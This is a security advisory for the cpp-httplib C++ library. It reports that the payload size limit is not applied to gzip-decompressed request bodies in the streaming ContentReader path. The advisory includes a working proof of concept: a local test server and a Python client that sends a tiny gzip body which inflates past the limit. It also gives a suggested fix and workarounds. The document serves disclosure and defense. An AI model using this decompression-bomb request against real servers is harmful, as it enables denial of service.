## Summary

cpp-httplib (httplib.h) does not enforce `Server::set_payload_max_length()` on the decompressed request body when using `HandlerWithContentReader` (streaming `ContentReader`) with `Content-Encoding: gzip` (or other supported encodings). A small compressed payload can expand beyond the configured payload limit and still be processed by the application, enabling a payload-size-limit bypass and potential denial of service (CPU/memory exhaustion).

This behavior is inconsistent with the non-streaming request body path (`req.body`), which rejects oversized decompressed bodies.
## Root Cause

The server request-body parsing path applies `payload_max_length_` to the number of bytes read from the network (compressed bytes) inside the `detail::read_content_*` functions. When `decompress=true`, `detail::prepare_content_receiver` wraps the receiver with a decompressor, but the size accounting/limit checks still track the compressed input length (e.g., `n` from the socket read), not the decompressed output length (`n2` passed to the receiver after inflate).

Additionally, the decompressed-size protection (the "zip bomb" guard) exists only when aggregating into `req.body` (the non-streaming path). When applications use `ContentReader` (streaming), the receiver is application-provided, and no decompressed-size limit is enforced by the library.
## Technical Flow (How the bypass happens)

1. `Server::routing()` detects a request with a body and constructs a `ContentReader`.
2. The streaming handler (`HandlerWithContentReader`) is matched and invoked via `dispatch_request_for_content_reader(...)`.
3. Inside the `ContentReader` callback, the library calls `read_content_with_content_receiver(...)` → `read_content_core(...)`, which calls `detail::read_content(strm, req, payload_max_length_, status, ..., out, decompress=true)`.
4. `detail::prepare_content_receiver(...)` enables decompression and wraps the receiver: compressed bytes are read from the socket and passed to the decompressor, which emits decompressed chunks to the application receiver.
5. The payload limit checks in the `read_content_with_length` / chunked / without-length paths count the compressed bytes read from the socket, so a tiny compressed payload can inflate to a large decompressed stream and still be accepted.
6. In contrast, the non-streaming path that builds `req.body` includes an explicit decompressed-size guard, so it rejects oversized decompressed bodies.
## Impact

An attacker can send `Content-Encoding: gzip` with a very small compressed `Content-Length` (e.g., a few hundred bytes) that inflates to a much larger body (hundreds of KB or more). When the server endpoint uses `HandlerWithContentReader`, the application can receive and process decompressed data far beyond `payload_max_length`, enabling:

- bypass of the intended payload size policy,
- increased CPU usage due to decompression work,
- increased memory usage depending on application processing,
- potential denial of service (DoS) in constrained environments or under high concurrency.
## Affected Configurations

- Server-side usage of `HandlerWithContentReader` (the `Server::Post/Put/Patch/Delete` overloads that take a `ContentReader`)
- Request-body decompression enabled via `CPPHTTPLIB_ZLIB_SUPPORT` and `Content-Encoding: gzip` (or another supported encoding)
- Any deployment that relies on `set_payload_max_length()` as a security boundary for request body size
## Proof of Concept (Reproduction)

### Server (C++)

Building requires zlib (`-lz`) and `CPPHTTPLIB_ZLIB_SUPPORT`.

`server64_strong.cpp`:
```cpp
#define CPPHTTPLIB_ZLIB_SUPPORT
#include "httplib.h"

#include <cstddef>
#include <iostream>

static void print_line(const char *tag, bool ok, size_t got, size_t limit) {
  std::cout << tag << " ok=" << ok << " got=" << got
            << " payload_max_length=" << limit << std::endl;
}

int main() {
  httplib::Server svr;

  const size_t LIMIT = 64 * 1024; // 64KB
  svr.set_payload_max_length(LIMIT);

  // Non-streaming path (req.body). This rejects the same payload (400 in this version).
  svr.Post("/body", [LIMIT](const httplib::Request &req, httplib::Response &res) {
    print_line("[/body]", true, req.body.size(), LIMIT);
    res.status = 200;
    res.set_content("body_ok\n", "text/plain");
  });

  // Streaming path (ContentReader). This accepts and processes decompressed output > LIMIT.
  svr.Post("/stream",
           [LIMIT](const httplib::Request & /*req*/, httplib::Response &res,
                   const httplib::ContentReader &content_reader) {
    size_t total = 0;
    bool ok = content_reader([&](const char * /*data*/, size_t len) {
      total += len; // len is decompressed bytes delivered to the callback
      return true;
    });
    print_line("[/stream]", ok, total, LIMIT);
    if (total > LIMIT) {
      std::cout << "[VULN] Decompressed body exceeded payload_max_length via ContentReader."
                << std::endl;
    }
    res.status = 200;
    res.set_content("stream_ok\n", "text/plain");
  });

  svr.set_error_handler([](const httplib::Request &, httplib::Response &res) {
    std::cout << "[error] status=" << res.status << std::endl;
  });

  std::cout << "Listening on 127.0.0.1:18080" << std::endl;
  bool ok = svr.listen("127.0.0.1", 18080);
  std::cerr << "listen ok=" << ok << std::endl;
  return ok ? 0 : 1;
}
```
Build & run:

```bash
g++ -O2 -std=c++17 -pthread server64_strong.cpp -lz -o server64_strong
./server64_strong
```
### Client (Python)

`poc_gzip_strong.py`:
```python
import gzip
import socket

HOST, PORT = "127.0.0.1", 18080

raw = b"A" * (256 * 1024)                 # 256KB decompressed
gz = gzip.compress(raw, compresslevel=9)  # ~290 bytes compressed


def send(path: str):
    req = (
        f"POST {path} HTTP/1.1\r\n".encode() +
        b"Host: 127.0.0.1\r\n"
        b"Connection: close\r\n"
        b"Content-Encoding: gzip\r\n"
        b"Content-Length: " + str(len(gz)).encode() + b"\r\n"
        b"\r\n" + gz
    )
    s = socket.create_connection((HOST, PORT))
    s.sendall(req)
    resp = b""
    while True:
        chunk = s.recv(4096)
        if not chunk:
            break
        resp += chunk
    s.close()
    print("==== Response for", path, "====")
    print(resp.decode(errors="ignore"))
    print("compressed   =", len(gz), "bytes")
    print("decompressed =", len(raw), "bytes")


send("/body")
send("/stream")
```
Run:

```bash
python3 poc_gzip_strong.py
```
## Observed Results

- The wire request shows a small compressed payload:

  ```
  Content-Encoding: gzip
  Content-Length: 290
  ```

- `/body` rejects the request (400 Bad Request in this version/build).
- `/stream` returns `200 OK` and the server prints:

  ```
  [/stream] ok=1 got=262144 payload_max_length=65536
  [VULN] Decompressed body exceeded payload_max_length via ContentReader.
  ```
## Expected Results

If `set_payload_max_length()` is configured with 64KB, the server should reject any request whose effective body size after decompression exceeds 64KB, regardless of whether the application uses `req.body` or `ContentReader`.
## Suggested Fix

Enforce `payload_max_length_` on the decompressed output in the `ContentReader` / content receiver decompression path. Concretely:

- Track the total number of decompressed bytes emitted by the decompressor (e.g., a `decompressed_total` counter).
- If emitting the next chunk would exceed `payload_max_length`, abort, return `413 Payload Too Large` (or equivalent), and stop further processing.
## Mitigations / Workarounds

- Do not enable request-body decompression for endpoints that use `ContentReader` (e.g., reject `Content-Encoding` headers on those endpoints).
- Enforce a decompressed-size limit in the application callback (count bytes and abort once a cap is reached).
- Do not rely on `payload_max_length` as a strict boundary when using `ContentReader` with decompression.